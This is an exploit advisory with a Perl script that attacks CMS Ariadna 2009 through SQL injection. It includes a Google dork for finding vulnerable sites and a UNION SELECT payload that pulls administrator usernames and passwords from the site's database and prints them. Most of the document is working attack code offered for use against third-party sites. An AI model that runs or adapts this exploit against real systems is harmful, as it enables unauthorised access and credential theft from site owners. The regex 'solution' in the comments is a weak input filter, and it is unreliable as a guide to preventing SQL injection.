# Exploit Title : CMS Ariadna 2009 SQL Injection# Date : 2010-04-19# Author : Andrés Gómez# Contact : gomezandres@adinet.com.uy# Dork : "allinurl: detResolucion.php?tipodoc_id="########################################################################
Exploit in Perl Start In Next Line:
use LWP::Simple;######################################################################### Malicious users may inject SQL querys into a vulnerable# application to fool a user in order to gather data from them or see
sensible information.######################################################################### Solution:# $_GET = preg_replace("|([^\w\s\'])|i",'',$_GET);# $_POST = preg_replace("|([^\w\s\'])|i",'',$_POST);######################################################################### Special Thanks : HYPERNETHOST & Security-Pentest & Mauro Rossi##########################[Andrés Gómez]#################################
my $target = $ARGV[0];
unless ($target){print "\n Inyector Remoto -- HYPERNETHOST &
Security-Pentest -- Andres Gomez\n\n";print"\ Dork: allinurl: detResolucion.php?tipodoc_id=\n";print "\nEjemplo Ejecucion = AriadnaCms.pl
http://www.sitio.extension/path/\n" ; exit 1;}
$sql ="detResolucion.php?tipodoc_id=33+and+1=0+union+select+concat(0x7365637572697479,adm_nombre,0x3a,0x70656e74657374,adm_clave)+from+administrador--";
$final = $target.$sql;
$contenido = get($final);print"\n\n[+] Pagina Web: $target\n\n";if($contenido =~/security(.*):pentest(.*)/){print"[-] Datos extraidos con exito:\n\n";print"[+] Usuario = $1\n";print"[+] Password = $2\n";}else{print"[-] No se obtuvieron datos\n\n";
exit 1;}print"\n[ñ] Escriba exit para salir de la aplicacion\n";
exit 1;
